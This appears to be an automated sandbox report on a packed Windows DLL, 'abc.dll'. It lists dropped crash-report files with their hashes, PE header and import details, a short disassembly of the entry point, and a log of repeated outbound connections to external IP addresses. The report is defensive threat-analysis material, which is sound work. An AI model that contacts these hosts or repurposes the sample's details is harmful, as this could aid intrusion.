          SHA-512:1A51C7465E1F20EB5B2EF283D4CBA6B01D5EB606770A1CE56BDD8870EE2913E9AD10930985C19F4996D39C84794B745BFD4585F0D77C9F02DBE3CCFF0D15B861
          Malicious:false
          Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.8.9.6.3.1.7.6.0.8.7.1.7.8.1.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.8.9.6.3.1.7.6.3.7.3.1.1.4.8.0.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.9.9.8.a.c.2.c.-.a.4.0.5.-.4.5.4.9.-.9.8.2.1.-.9.d.a.6.7.d.9.b.f.9.d.8.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.3.3.7.a.e.9.f.-.d.4.5.2.-.4.a.5.4.-.a.0.e.b.-.b.8.1.3.6.3.0.f.c.1.a.d.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.3.3.0.-.0.0.0.1.-.0.0.1.6.-.0.e.b.6.-.b.2.2.7.7.f.2.4.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.b.c.c.5.d.c.3.2.2.2.0.3.4.d.3.f.2.5.7.f.1.f.d.3.5.8.8.9.e.5.b.e.9.0.f.0.9.
          Process:C:\Windows\SysWOW64\WerFault.exe
          File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
          Category:dropped
          Size (bytes):65536
          Entropy (8bit):1.0171793634245108
          Encrypted:false
          SSDEEP:192:w1iG0oXUHBUZMX4jed+57wUP/u7sFS274ItWc:OigXcBUZMX4jec/P/u7sFX4ItWc
          MD5:62CF4068452243EAEA34BDA0241DA77D
          SHA1:B5D95FE685923C60BE88282696C6C3687A313C6A
          SHA-256:B91883D4AAC2704234C1F7693FB873193CBB2D98BE947A02E1593218D562018C
          SHA-512:15CD38B1B90A6FC4284C02C2D57839BFA4CD8468B4FC7CD9D9EBEEA5F15DF4A1A7B524A27ED3C450FCC5B8969F14BC9E0BD8E5D2E58469AC4377C0D4C33F17AC
          Malicious:false
          Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.8.9.6.3.1.7.5.4.1.6.4.5.6.1.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.8.9.6.3.1.7.5.7.3.2.0.8.9.8.0.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.8.e.9.a.7.5.8.-.1.4.1.f.-.4.3.0.9.-.b.8.7.8.-.8.f.4.7.d.b.a.6.6.2.5.1.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.2.0.f.1.1.5.6.-.6.d.c.f.-.4.8.c.7.-.9.8.b.5.-.0.0.e.8.3.7.b.d.c.4.a.0.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.2.0.c.-.0.0.0.1.-.0.0.1.6.-.4.f.9.b.-.e.7.2.4.7.f.2.4.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.b.c.c.5.d.c.3.2.2.2.0.3.4.d.3.f.2.5.7.f.1.f.d.3.5.8.8.9.e.5.b.e.9.0.f.0.9.
          Process:C:\Windows\SysWOW64\WerFault.exe
          File Type:Mini DuMP crash report, 14 streams, Fri Feb 18 04:22:35 2022, 0x1205a4 type
          Category:dropped
          Size (bytes):47300
          Entropy (8bit):2.162858492135586
          Encrypted:false
          SSDEEP:192:ejnpyZ9x1ed0pNgNYuZRO5SkbhBKBJ/QiD1RY2MGfMohBzYoAnl4N:gIaCpNWE5Lbh8/QiEjGfMohBzYTK
          MD5:5B9CAA3EFA25911056C03E75AA1E3A82
          SHA1:DA0193FC91E5C91E19DB0B9375449197F7F532DD
          SHA-256:4F8B5F656EDEE1C67FC8689557E76D35DF94E206B7F21E082582219941E89CF3
          SHA-512:A1107103A681F03843401C375292B432EDDF0838EC7C185FFB3E3202530672DB88E3919950CDE6B4069396FDB92ADCEAE432267129C072C91C71AFA554A0A645
          Malicious:false
          Preview:MDMP....... ..........b.........................................4..........T.......8...........T...........H...|............ ..........p"...................................................................U...........B.......#......GenuineIntelW...........T..............b.............................0..1...............P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................
          Process:C:\Windows\SysWOW64\WerFault.exe
          File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
          Category:dropped
          Size (bytes):8272
          Entropy (8bit):3.6914100474180014
          Encrypted:false
          SSDEEP:192:Rrl7r3GLNiNH6i666Yx06D4gmfTOS/Cprd89bJ9sf8jm:RrlsNiN6y6YS6D4gmfTOSNJ2fl
          MD5:6BEF64FFFE0FEA11A8F5B6FD4F9BF02F
          SHA1:6554498306D0D69CA117BB51C00BA84740F6AF88
          SHA-256:40181593E3AE95DD5B1D6B45AC3077949F2708651106B13544833ADD127ADB27
          SHA-512:00C6204014C56015C6A62D8B8CFE9FA7A7047B159F8CB0E06CE32B8874C6812AC6620ACCE45CEB0BA014BDE58103451BA94E0B6ABF7910637B0F8C762533D64F
          Malicious:false
          Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.6.2.0.<./.P.i.d.>.......
          Process:C:\Windows\SysWOW64\WerFault.exe
          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
          Category:dropped
          Size (bytes):4630
          Entropy (8bit):4.454279436817118
          Encrypted:false
          SSDEEP:48:cvIwSD8zscJgtWI9KMWSC8B2n8fm8M4JCds76FR+q8/MrM04SrSEd:uITfallSNcsJdyzM0DWEd
          MD5:29A69C9F85693448C81BAC0BD12E865E
          SHA1:887B9DCD9F9A54E192110043CA54B6078CF01724
          SHA-256:039B319D7E4BECD9FC1B457CFC81033289F4854A73E7E39806917EEF1F6C28D7
          SHA-512:ED077C0AC6A7F3034F1A4E7335C641643E70AF97679B7ED75A0CD90F0DC0CABC1CFA458314478938AAC82D7B9E52E58CBB2B29FCB5AB79DE72F71464CC45595A
          Malicious:false
          Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1391853" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
          Process:C:\Windows\SysWOW64\WerFault.exe
          File Type:Mini DuMP crash report, 14 streams, Fri Feb 18 04:22:41 2022, 0x1205a4 type
          Category:dropped
          Size (bytes):47346
          Entropy (8bit):2.1538940665132964
          Encrypted:false
          SSDEEP:384:W69pNE5LbZMpZyClE0EXSfy8YhZ/uL9Xh6Nu:W4p6VbZQyFXB8YD66k
          MD5:EFD1F782C6E3C87C9E2DDC6C26BF275C
          SHA1:FADFCA208A24918CCA476F614A2A876482AC381F
          SHA-256:AB40F7E733F5A0007CF6FFFBD71BB4143BA800FB857211353F63819787574E38
          SHA-512:66FF42926AAB9FF3AEEE038CC9D46ECF9DEB3A8D499DCA5BAF2748A57264D517EB6A1A01B0FC22B8EAB174840BDD6CDAB53AFEAB2951B6D78F450A773160F22B
          Malicious:false
          Preview:MDMP....... ..........b.........................................4..........T.......8...........T........... ............... ..........p"...................................................................U...........B.......#......GenuineIntelW...........T.......0......b.............................0..1...............P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................
          Process:C:\Windows\SysWOW64\WerFault.exe
          File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
          Category:dropped
          Size (bytes):8252
          Entropy (8bit):3.689254887467385
          Encrypted:false
          SSDEEP:192:Rrl7r3GLNibr696YpW6IgmfTOS/Cprk89bBjsfFCrm:RrlsNiX696Yo6IgmfTOSGBIfF3
          MD5:60239EB558CA598BF3DF75B57D41AA34
          SHA1:205F41424FDA62053CD5F1AA5124D452DA7F3279
          SHA-256:6C8BE1EFEE076B771851CD97AABC2E6F3C43362A2B3ECD6D4C8A29891E093CD1
          SHA-512:1822595FB4A1E3C68479EA6DBE6AEE9127007412CF2F17471F5C3555BB897FCE1114F9BA35D3E614FCA038EEC0A75F99E2A6AF04DF14C80BC3A49404843E68E5
          Malicious:false
          Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.9.1.2.<./.P.i.d.>.......
          Process:C:\Windows\SysWOW64\WerFault.exe
          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
          Category:dropped
          Size (bytes):4630
          Entropy (8bit):4.452143976528709
          Encrypted:false
          SSDEEP:48:cvIwSD8zscJgtWI9KMWSC8Bm8fm8M4JCds76F845++q8/MrPBE04SrSid:uITfallSN5JdCQzPBE0DWid
          MD5:38E745E346C15E750B826783DACC215F
          SHA1:C4DBFAF2F6A8CB821B4A1B4A58F8D5871183CC36
          SHA-256:BED9F5CB642A0A3D58D7366734F5AD4409C356F53C1097546DFB66D061C3CA8F
          SHA-512:9BD8816715937EE822F82314D839074305D6CB4D90DC0F7BF67FDDC507884F54EAD703F8B67E2EE1D5963E25EED8B13F30BA54E729B75A72B8244BC705A7B2E6
          Malicious:false
          Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1391853" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
          Process:C:\Windows\SysWOW64\WerFault.exe
          File Type:MS Windows registry file, NT/2000 or above
          Category:dropped
          Size (bytes):1572864
          Entropy (8bit):4.26630677573255
          Encrypted:false
          SSDEEP:12288:dztKJGAy/CuOo9ue4woquNUkWUfc4cV8Vs6tmkq1ujNZ8cz4TQDsCCdt:dtKJGAy/CuOo9uetwlUt
          MD5:2FC1C9C382DBCEE5B71A0C19E92C37C9
          SHA1:D5C9ACE1C643C9BF4704834D4416C062B2A013F9
          SHA-256:ED6823D74DCD3E153E1815B684EA57CDFA6D81E360500380F72F937841865EE0
          SHA-512:C71DE98356CB24ECA7AC76FC12E5409AE76DC21CB57A527A2CEA354E6A629F35FE7FD2A4D8377918A60A35FA3D0BA98187BBD19EDB2A3B20060C51D0E5BB52ED
          Malicious:false
          Preview:regfQ...Q...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtm..&.$...............................................................................................................................................................................................................................................................................................................................................N.{........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
          Process:C:\Windows\SysWOW64\WerFault.exe
          File Type:MS Windows registry file, NT/2000 or above
          Category:dropped
          Size (bytes):24576
          Entropy (8bit):3.8414398684418796
          Encrypted:false
          SSDEEP:384:BRkW5cZrdudXX5OQp8XXLnxOf2obPmxwp65GjZmGuFDTTej5N5rAR1H:BSYCrAXXTpigf2oaxwpmWmGuVTeNN5Mz
          MD5:DD5ED7F212ECDD8A5D54FCD9F0F6A50F
          SHA1:0C3949C5D05C488BFEB473C625755587DBE7C535
          SHA-256:70CA5452E16AD21F1FF1BE957601D6F4AE83AF7BB7E2A278DFF061188653D339
          SHA-512:5FD34A403BDB7CB049CA658F930301E80D31FADD86D123AEA8E89EF7FC4F1635083E6AA4E45AC1C136294A76E783D206641CBCC5C6BD825D3B4394F9C2EA290F
          Malicious:false
          Preview:regfP...P...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtm..&.$...............................................................................................................................................................................................................................................................................................................................................N.{HvLE.^......P...........{....Y....@.f+H............................. ..hbin................p.\..,..........nk,..<.&.$.................................. ...........................&...{ad79c032-a2ea-f756-e377-72fb9332c3ae}......nk ..<.&.$...... ...........P............... .......Z.......................Root........lf......Root....nk ..<.&.$...................}.............. ...............*...............DeviceCensus.......................vk..................WritePermissionsCheck...
          File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, PECompact2 compressed
          Entropy (8bit):7.838279679201665
          TrID:
          • Win32 Dynamic Link Library (generic) (1002004/3) 90.54%
          • Win32 EXE PECompact compressed (v2.x) (59071/9) 5.34%
          • Win32 EXE PECompact compressed (generic) (41571/9) 3.76%
          • Generic Win/DOS Executable (2004/3) 0.18%
          • DOS Executable Generic (2002/1) 0.18%
          File name:abc.dll
          File size:215157
          MD5:4095efe5247d786f5c8f03ee2678fe0a
          SHA1:8fabbc1778b684e161d312a28aa16f065c3bf330
          SHA256:a5d3d3c385f1405b606bd2427f625f24c81266bca36d552f5eb61dc82f887276
          SHA512:975b6e784191bd8e968bd9794022a7e2bee55f3cb1ec5ea57e6df008f5e4803c52d7fd671e5fe022d3dfb43f1225adb479ae725aede4f800a4ed2c20858ee368
          SSDEEP:3072:MI/38csWuZwCMZ9kfuZJR+go6+n05NkxbmUVg/GXJb8Rps6T+y:9MIuSrZJR+gopn6sCShm+y
          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......... B..N...N...N...B...N.F.....N.......N.......N.......N...@...N.m.D...N...O.^.N.m.E...N.=.H...N.m.J...N.Rich..N................
          Icon Hash:74f0e4ecccdce0e4
          Entrypoint:0x1005c293
          Entrypoint Section:.rsrc
          Digitally signed:false
          Imagebase:0x10000000
          Subsystem:windows gui
          Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LINE_NUMS_STRIPPED
          DLL Characteristics:
          Time Stamp:0x5665074D [Mon Dec 7 04:13:01 2015 UTC]
          TLS Callbacks:
          CLR (.Net) Version:
          OS Version Major:4
          OS Version Minor:0
          File Version Major:4
          File Version Minor:0
          Subsystem Version Major:4
          Subsystem Version Minor:0
          Import Hash:e04371d2deed5fef96eec468f2602fea
          Instruction
          mov eax, 1005D0A0h
          push eax
          push dword ptr fs:[00000000h]
          mov dword ptr fs:[00000000h], esp
          xor eax, eax
          mov dword ptr [eax], ecx
          push eax
          inc ebp
          inc ebx
          outsd
          insd
          jo 00007F73B8D556C3h
          arpl word ptr [edx+esi+00h], si
          add byte ptr [eax], al
          or byte ptr [eax+eax], cl
          dec eax
          loope 00007F73B8D55663h
          push esi
          push edi
          push ebx
          push ebp
          mov ebx, dword ptr [esp+1Ch]
          test ebx, ebx
          je 00007F7376BD7811h
          push cs
          out 60h, al
          or eax, 72656B0Bh
          outsb
          insb
          xor esi, dword ptr [edx]
          adc al, 44h
          push es
          mov eax, C08513FFh
          cmp byte ptr [edi+0CE8F08Bh], cl
          xor eax, dword ptr [esi+6900ECE3h]
          jc 00007F73B8D556D6h
          jne 00007F73B8D556C3h
          insb
          inc esi
          sbb bh, bh
          push ebx
          add al, 3Eh
          mov dword ptr [8BFFC4D0h], eax
          call 00007F735C1671D7h
          xor eax, dword ptr [edi+636F6E15h]
          sbb al, 58h
          mov esp, dword ptr [esp+edx]
          jl 00007F73B8D555F1h
          sar ecx, FFFFFFA1h
          sbb byte ptr [edx+68h], ch
          adc byte ptr [eax-01h], cl
          pushad
          clc
          cmp dword ptr [ecx], 3F33D008h
          mov ebx, eax
          push eax
          push esp
          jbe 00007F73B8D55666h
          push edi
          or byte ptr [eax], cl
          lea eax, dword ptr [esi+0Fh]
          inc edx
          aad C9h
          stc
          mov dh, 0Ch
          add eax, FF0C300Dh
          adc dword ptr [esi], ecx
          push eax
          push ebx
          call 00007F737D58FF88h
          sub byte ptr [edx+58h], bl
          je 00007F73B8D55665h
          int3
          adc dword ptr [edx], esi
          jne 00007F73B8D55695h
          dec eax
          push eax
          add byte ptr [eax+53h], FFFFFFD5h
          pop eax
          push eax
          add byte ptr [edx], cl
          push eax
          Programming Language:
          • [ C ] VS98 (6.0) build 8168
          • [RES] VS98 (6.0) cvtres build 1720
          • [C++] VS98 (6.0) build 8168
          • [LNK] VS98 (6.0) imp/exp build 8168
          • [IMP] VS2008 SP1 build 30729
          NameVirtual AddressVirtual Size Is in Section
          IMAGE_DIRECTORY_ENTRY_EXPORT0x5bf100x63.rsrc
          IMAGE_DIRECTORY_ENTRY_IMPORT0x5c0040x2f3.rsrc
          IMAGE_DIRECTORY_ENTRY_RESOURCE0x570000x4efc.rsrc
          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
          IMAGE_DIRECTORY_ENTRY_BASERELOC0x5e0000x18.reloc
          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
          IMAGE_DIRECTORY_ENTRY_IAT0x00x0
          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
          NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
          .text0x10000x560000x2e000False1.00035028872data7.99891570226IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          .rsrc0x570000x70000x6200False0.432278380102data4.95304384319IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          .reloc0x5e0000x10000x200False0.05859375data0.22872628451IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
          NameRVASizeTypeLanguageCountry
          TYPELIB0x570700x4e8cdataEnglishUnited States
          DLLImport
          kernel32.dllLoadLibraryA, GetProcAddress, VirtualAlloc, VirtualFree
          MFC42.DLL
          MSVCRT.dlltolower
          USER32.dllGetDesktopWindow
          ADVAPI32.dllRegEnumValueA
          WS2_32.dllbind
          SHLWAPI.dllPathIsDirectoryA
          ole32.dllCoCreateInstance
          OLEAUT32.dllSysAllocString
          MSVCP60.dll?_C@?1??_Nullstr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@CAPBDXZ@4DB
          NETAPI32.dllNetbios
          NameOrdinalAddress
          Dispatch10x10008656
          InputFile20x1000678b
          PrintFile30x1000443d
          Language of compilation systemCountry where language is spokenMap
          EnglishUnited States
          TimestampSource PortDest PortSource IPDest IP
          Feb 17, 2022 20:22:27.845047951 CET4975118530192.168.2.5107.163.56.231
          Feb 17, 2022 20:22:27.845228910 CET4975218530192.168.2.5107.163.56.110
          Feb 17, 2022 20:22:30.863785982 CET4975218530192.168.2.5107.163.56.110
          Feb 17, 2022 20:22:30.895000935 CET4975118530192.168.2.5107.163.56.231
          Feb 17, 2022 20:22:36.879841089 CET4975218530192.168.2.5107.163.56.110
          Feb 17, 2022 20:22:37.004913092 CET4975118530192.168.2.5107.163.56.231
          Feb 17, 2022 20:22:50.075361967 CET497626658192.168.2.5107.163.56.251
          Feb 17, 2022 20:22:53.055465937 CET4976318963192.168.2.5107.163.56.232
          Feb 17, 2022 20:22:53.057245016 CET4976418963192.168.2.5107.163.56.232
          Feb 17, 2022 20:22:53.240674973 CET497626658192.168.2.5107.163.56.251
          Feb 17, 2022 20:22:56.225308895 CET4976318963192.168.2.5107.163.56.232
          Feb 17, 2022 20:22:56.225333929 CET4976418963192.168.2.5107.163.56.232
          Feb 17, 2022 20:22:56.939627886 CET4976580192.168.2.5123.126.45.92
          Feb 17, 2022 20:22:57.126286030 CET4976618963192.168.2.5107.163.56.232
          Feb 17, 2022 20:22:57.410754919 CET4976718963192.168.2.5107.163.56.232
          Feb 17, 2022 20:22:57.825294018 CET4976880192.168.2.5123.126.45.92
          Feb 17, 2022 20:22:59.241122961 CET497626658192.168.2.5107.163.56.251
          Feb 17, 2022 20:23:00.225594044 CET4976618963192.168.2.5107.163.56.232
          Feb 17, 2022 20:23:00.538079023 CET4976718963192.168.2.5107.163.56.232
          Feb 17, 2022 20:23:00.835042000 CET4976880192.168.2.5123.126.45.92
          Feb 17, 2022 20:23:01.151609898 CET4976918963192.168.2.5107.163.56.232
          Feb 17, 2022 20:23:01.263386011 CET4977018963192.168.2.5107.163.56.232
          Feb 17, 2022 20:23:01.658067942 CET4977180192.168.2.5123.126.45.92
          Feb 17, 2022 20:23:04.225925922 CET4976918963192.168.2.5107.163.56.232
          Feb 17, 2022 20:23:04.335351944 CET4977018963192.168.2.5107.163.56.232
          Feb 17, 2022 20:23:04.726066113 CET4977180192.168.2.5123.126.45.92
          Feb 17, 2022 20:23:05.186161041 CET4977218963192.168.2.5107.163.56.232
          Feb 17, 2022 20:23:05.302572966 CET4977318963192.168.2.5107.163.56.232
          Feb 17, 2022 20:23:05.656567097 CET4977480192.168.2.5123.126.45.92
          Feb 17, 2022 20:23:08.226280928 CET4977218963192.168.2.5107.163.56.232
          Feb 17, 2022 20:23:08.335701942 CET4977318963192.168.2.5107.163.56.232
          Feb 17, 2022 20:23:08.726299047 CET4977480192.168.2.5123.126.45.92
          Feb 17, 2022 20:23:09.328409910 CET4977518963192.168.2.5107.163.56.232
          Feb 17, 2022 20:23:09.332163095 CET4977618963192.168.2.5107.163.56.232
          Feb 17, 2022 20:23:09.418652058 CET4977780192.168.2.5123.126.45.92
          Feb 17, 2022 20:23:11.421793938 CET497796658192.168.2.5107.163.56.251
          Feb 17, 2022 20:23:12.335994959 CET4977518963192.168.2.5107.163.56.232
          Feb 17, 2022 20:23:12.351654053 CET4977618963192.168.2.5107.163.56.232
          Feb 17, 2022 20:23:12.554766893 CET4977780192.168.2.5123.126.45.92
          Feb 17, 2022 20:23:13.354952097 CET4978218963192.168.2.5107.163.56.232
          Feb 17, 2022 20:23:13.531780958 CET4978318963192.168.2.5107.163.56.232
          Feb 17, 2022 20:23:13.883939028 CET4978480192.168.2.5123.126.45.92
          Feb 17, 2022 20:23:14.539293051 CET497796658192.168.2.5107.163.56.251
          Feb 17, 2022 20:23:16.351938009 CET4978218963192.168.2.5107.163.56.232
          Feb 17, 2022 20:23:16.555085897 CET4978318963192.168.2.5107.163.56.232
          Feb 17, 2022 20:23:17.055119991 CET4978480192.168.2.5123.126.45.92
          Feb 17, 2022 20:23:17.401120901 CET4978518963192.168.2.5107.163.56.232
          Feb 17, 2022 20:23:17.531799078 CET4978618963192.168.2.5107.163.56.232
          Feb 17, 2022 20:23:17.647183895 CET4978780192.168.2.5123.126.45.92
          Feb 17, 2022 20:23:20.539802074 CET497796658192.168.2.5107.163.56.251
          Feb 17, 2022 20:23:20.555504084 CET4978518963192.168.2.5107.163.56.232
          Feb 17, 2022 20:23:20.556371927 CET4978618963192.168.2.5107.163.56.232
          Feb 17, 2022 20:23:20.742925882 CET4978780192.168.2.5123.126.45.92
          Feb 17, 2022 20:23:21.433780909 CET4978918963192.168.2.5107.163.56.232
          Feb 17, 2022 20:23:21.550321102 CET4979018963192.168.2.5107.163.56.232
